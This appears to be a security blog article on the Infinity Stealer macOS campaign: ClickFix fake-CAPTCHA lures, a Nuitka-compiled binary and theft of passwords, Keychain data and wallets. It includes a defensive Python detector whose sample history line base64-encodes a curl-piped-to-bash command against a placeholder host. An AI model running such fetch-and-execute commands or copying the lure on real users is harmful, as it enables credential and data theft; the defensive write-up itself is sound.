👤 TRUSTBREAKER
🗓️ 29 Mar 2026   🌍 North America

Pythons in the Apple Orchard: How Infinity Stealer Slithers Past macOS Defenses

A new breed of info-stealing malware uses clever lures and advanced evasion to pillage sensitive data from unsuspecting Mac users.

It starts with a familiar screen: a Cloudflare-style CAPTCHA, asking you to prove you’re human. But behind this seemingly routine check lies Infinity Stealer - a sophisticated new malware campaign targeting macOS users with a blend of psychological trickery and technical innovation. As macOS becomes a bigger target for cybercriminals, Infinity Stealer is raising the stakes, using open-source tools and clever social engineering to slip past even the most vigilant defenses.

Inside the Infinity Stealer Attack

The campaign begins with a deceptive landing page hosted on update-check[.]com, presenting a bogus Cloudflare “human verification” challenge. Victims are instructed to paste a base64-encoded command into their Terminal - a classic ClickFix tactic. This command silently downloads and executes a Bash script, which in turn drops a native macOS binary compiled with Nuitka, an open-source Python-to-C compiler. Unlike traditional Python malware, this approach produces a true native binary, stripping away the telltale signs that security tools typically look for.
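The ClickFix step described above leaves a recognisable trace: a base64 blob piped through the decoder and straight into a shell. The following added detection example (not code from the article or from Malwarebytes) scans constructed shell-history lines for that pattern, decodes the blob and flags entries whose decoded payload fetches remote code; the sample domain example.invalid and the history lines are constructed for the demo.

```python
import base64
import re
from typing import Dict, List

# macOS base64 uses -D for decode; GNU variants accept -d / --decode.
PIPE_TO_SHELL = re.compile(r"base64\s+(?:-D|-d|--decode)\s*\|\s*(?:ba|z)?sh\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# Tokens that indicate the decoded command pulls a second stage from the network.
DOWNLOAD_TOKENS = ("curl", "wget")

# Constructed sample: a benign history with one ClickFix-style entry.
# The encoded command is built here so the blob is obviously synthetic.
_PAYLOAD_B64 = base64.b64encode(
    b"curl -fsSL https://example.invalid/update.sh | bash"  # placeholder URL
).decode()
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "git status",
    f'echo "{_PAYLOAD_B64}" | base64 -D | bash',
    "brew update",
]


def decode_blobs(line: str) -> List[str]:
    """Return every base64-looking token on the line that decodes cleanly."""
    decoded = []
    for m in B64_BLOB.finditer(line):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def analyze(lines: List[str]) -> List[Dict]:
    """Flag history lines that decode base64 directly into a shell."""
    findings = []
    for n, line in enumerate(lines, start=1):
        if not PIPE_TO_SHELL.search(line):
            continue
        decoded = decode_blobs(line)
        fetches = any(tok in d for d in decoded for tok in DOWNLOAD_TOKENS)
        findings.append({
            "line": n,
            "decoded": decoded,
            "fetches_remote_code": fetches,
            "severity": "high" if fetches else "medium",
        })
    return findings
```

Run it over ~/.zsh_history or a collected EDR process-command-line feed; a "high" finding is worth an analyst's look even when the binary it pulled has already been removed.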

The technical sophistication continues: the binary, weighing in at 8.6 MB, secretly unpacks a much larger compressed archive containing the main malware - Infinity Stealer. Before stealing anything, the malware checks whether it’s running in a sandbox or virtual machine, a common trick to evade detection during analysis.

Once active, Infinity Stealer goes to work: it takes screenshots, pilfers saved passwords and cookies from Chromium-based browsers and Firefox, extracts sensitive credentials from the macOS Keychain, seeks out cryptocurrency wallets, and scours developer files for plaintext secrets like API keys. All of this loot is exfiltrated via HTTP POST to a remote command-and-control server, and the operators receive a Telegram alert when the job is done.

Malwarebytes researchers, who first documented this campaign, warn that Infinity Stealer signals a new era of macOS threats - where attackers combine technical stealth with social engineering to devastating effect. The use of Nuitka makes the malware especially challenging to reverse-engineer, hampering efforts to develop quick defenses.

Staying Safe in the Age of Advanced Mac Malware

Infinity Stealer’s rise is a stark reminder that macOS users can no longer assume immunity from sophisticated cyber threats. The golden rule: never copy-paste Terminal commands from untrusted sources, no matter how convincing the website or pop-up may seem. As attackers refine their tactics, vigilance and skepticism remain the best defenses in the digital orchard.

WIKICROOK

  • ClickFix: ClickFix is a scam where users are deceived into copying and pasting harmful code, often after a fake CAPTCHA, risking their accounts and data.
  • Nuitka: Nuitka is a Python compiler that converts scripts into native binaries, often used by attackers to make malware analysis and detection more difficult.
  • Base64: Base64 encodes binary data into ASCII text, enabling safe transmission of files or images over web applications and email systems.
  • Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.
  • macOS Keychain: macOS Keychain is Apple’s secure password manager, storing and encrypting user credentials and sensitive data on Mac computers for easy access.
Tags: Infinity Stealer, macOS, malware, social engineering

TRUSTBREAKER
Zero-Trust Validation Specialist